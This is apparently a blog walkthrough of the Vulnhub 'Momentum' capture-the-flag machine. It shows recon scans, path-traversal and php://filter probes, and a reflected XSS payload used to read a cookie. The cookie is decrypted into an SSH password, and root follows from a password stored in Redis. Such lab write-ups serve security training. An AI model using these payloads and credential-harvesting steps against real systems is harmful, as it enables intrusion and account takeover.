
Vulnhub: Momentum machine test walkthrough

Posted: 2022-12-28 11:24:09  Views: 36

Momentum

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                           
                                                                                                                         
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                        
 192.168.56.100  08:00:27:75:2a:10      1      60  PCS Systemtechnik GmbH                                                
 192.168.56.137  08:00:27:80:8e:c9      1      60  PCS Systemtechnik GmbH                                                


Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.137.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.137 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-27 21:15 EST
Nmap scan report for bogon (192.168.56.137)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
|   256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_  256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Momentum | Index 
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:80:8E:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.76 seconds

The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

The next stage of information gathering focuses on port 80. Opening it in a browser, the page contains 4 images; download them to the local Kali Linux machine:

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ls
a.jpg  b.jpg  c.jpg  d.jpg  nmap_full_scan
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ exiftool a.jpg        
ExifTool Version Number         : 12.44
File Name                       : a.jpg
Directory                       : .
File Size                       : 501 kB
File Modification Date/Time     : 2022:12:27 21:18:06-05:00
File Access Date/Time           : 2022:12:27 21:18:06-05:00
File Inode Change Date/Time     : 2022:12:27 21:18:06-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1920x1080
Megapixels                      : 2.1
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ steghide extract -sf a.jpg        
Enter passphrase: 
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ stegseek a.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.85% (133.2 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ binwalk -e a.jpg        

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01


There is good reason to believe that no further information can be extracted from the 4 images.

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.137 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ nikto -h http://192.168.56.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.137
+ Target Hostname:    192.168.56.137
+ Target Port:        80
+ Start Time:         2022-12-27 21:22:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d1, size: 5c086352f5b80, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-12-27 21:23:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? n

                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/12/27 21:23:46 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/server-status        (Status: 403) [Size: 279]
Progress: 218055 / 220561 (98.86%)===============================================================
2022/12/27 21:24:23 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:26:08 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 2001]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1323086 / 1323366 (99.98%)===============================================================
2022/12/27 21:30:25 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
Progress: 848352 / 850254 (99.78%)===============================================================
2022/12/27 21:34:17 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt
Completing file
AdobeCQ-AEM.txt                               local-ports.txt                             
AdobeXML.fuzz.txt                             Logins.fuzz.txt                             
aem2.txt                                      LotusNotes.fuzz.txt                         
Apache.fuzz.txt                               netware.txt                                 
ApacheTomcat.fuzz.txt                         nginx.txt                                   
apache.txt                                    oauth-oidc-scopes.txt                       
api/                                          Oracle9i.fuzz.txt                           
axis.txt                                      OracleAppServer.fuzz.txt                    
big.txt                                       Oracle-EBS-wordlist.txt                     
burp-parameter-names.txt                      oracle.txt                                  
BurpSuite-ParamMiner/                         Passwords.fuzz.txt                          
CGI-HTTP-POST.fuzz.txt                        PHP.fuzz.txt                                
CGI-HTTP-POST-Windows.fuzz.txt                proxy-conf.fuzz.txt                         
CGI-Microsoft.fuzz.txt                        Public-Source-Repo-Issues.json              
CGIs.txt                                      quickhits.txt                               
CGI-XPlatform.fuzz.txt                        raft-large-directories-lowercase.txt        
CMS/                                          raft-large-directories.txt                  
coldfusion.txt                                raft-large-extensions-lowercase.txt         
combined_directories.txt                      raft-large-extensions.txt                   
combined_words.txt                            raft-large-files-lowercase.txt              
common-and-dutch.txt                          raft-large-files.txt                        
common-and-french.txt                         raft-large-words-lowercase.txt              
common-and-italian.txt                        raft-large-words.txt                        
common-and-portuguese.txt                     raft-medium-directories-lowercase.txt       
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:34:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.js         (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.sh         (Status: 403) [Size: 279]
/.htpasswd.js         (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.sh         (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status        (Status: 403) [Size: 279]
Progress: 120416 / 122862 (98.01%)===============================================================
2022/12/27 21:35:05 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:35:35 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status        (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 135449 / 373710 (36.24%)[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143081 / 373710 (38.29%)[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 2001]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 372828 / 373710 (99.76%)===============================================================
2022/12/27 21:36:46 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:37:06 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status        (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 134643 / 180006 (74.80%)[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143139 / 180006 (79.52%)[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
Progress: 179448 / 180006 (99.69%)===============================================================
2022/12/27 21:37:49 Finished
===============================================================
                                                                   

So far the scans have not turned up any directory or file of value. Going back to the home page and clicking on an image, note the following URL:

http://192.168.56.137/opus-details.php?id=visor

Could there be a file inclusion vulnerability?

But visiting

http://192.168.56.137/opus-details.php?id=../../../../../../etc/passwd

only returns the literal string /etc/passwd, so there may be some filtering in place.

Trying a PHP filter bypass:

http://192.168.56.137/opus-details.php?id=php://filter/convert.base64-encode/resource=opus-details

still returns nothing.

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/js/main.js
function viewDetails(str) {

  window.location.href = "opus-details.php?id="+str;
}

/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/

When browsing the web we frequently deal with user login: once logged in, the server returns a cookie value. This cookie acts as a token, and holding the token is equivalent to proving that you are a given user.
If your cookie value is stolen, an attacker can very likely use that token to log in to your account directly, without the password. To read the current page's cookie value from a script, document.cookie is commonly used.

Construct a URL to retrieve the cookie value:

http://192.168.56.137/opus-details.php?id=%3Cscript%3Ealert(document.cookie);%3C/script%3E

This yields the cookie value:

cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

From the JS file we know that this value is AES encrypted, and that the passphrase is: SecretPassphraseMomentum

Decrypting it on an online AES site gives:

auxerre-alienum##

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ssh [email protected]
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:NLUFYImFHvyED76cAzjnxD3dTxP5rzmEHrx4acGvM9c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ id
uid=1000(auxerre) gid=1000(auxerre) groups=1000(auxerre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
auxerre@Momentum:~$ sudo -l
-bash: sudo: command not found
auxerre@Momentum:~$ ls -alh
total 28K
drwxr-xr-x 3 auxerre auxerre 4.0K Apr 22  2021 .
drwxr-xr-x 3 root    root    4.0K Apr 19  2021 ..
-rw------- 1 auxerre auxerre    0 Apr 22  2021 .bash_history
-rw-r--r-- 1 auxerre auxerre  220 Apr 19  2021 .bash_logout
-rw-r--r-- 1 auxerre auxerre 3.5K Apr 19  2021 .bashrc
-rw-r--r-- 1 auxerre auxerre  807 Apr 19  2021 .profile
drwx------ 2 auxerre auxerre 4.0K Apr 21  2021 .ssh
-rwx------ 1 auxerre auxerre  146 Apr 22  2021 user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
auxerre@Momentum:~$ cat .bash_history 

Privilege escalation

Upload the linpeas.sh script to the target's /tmp directory, make it executable and run it; its output shows that the target is listening on port 6379, i.e. Redis:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports                                                  
tcp     LISTEN   0        128            127.0.0.1:6379          0.0.0.0:*                                                
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        128                [::1]:6379             [::]:*      
tcp     LISTEN   0        128                    *:80                  *:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      

auxerre@Momentum:/tmp$ redis-cli
127.0.0.1:6379> keys *
1) "rootpass"
127.0.0.1:6379> get rootpass
"m0mentum-al1enum##"
127.0.0.1:6379> exit
auxerre@Momentum:/tmp$ su - root
Password: 
root@Momentum:~# cd /root
root@Momentum:~# ls -alh
total 24K
drwx------  3 root root 4.0K Apr 22  2021 .
drwxr-xr-x 18 root root 4.0K Apr 19  2021 ..
-rw-------  1 root root    0 Apr 22  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Apr 21  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwx------  1 root root  162 Apr 22  2021 root.txt
root@Momentum:~# cat root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3

root@Momentum:~# 

Lessons learned

  1. Seeing the shape of the URL, I assumed a local file inclusion vulnerability, but the attempts, including the PHP filter wrapper, did not produce the expected result. During testing, pay attention to what is actually returned: the response was neither "not found" nor empty, so something else had to be going on. Looking at the JS code then showed that it was the JS code being executed.

From: https://www.cnblogs.com/jason-huawen/p/17009703.html
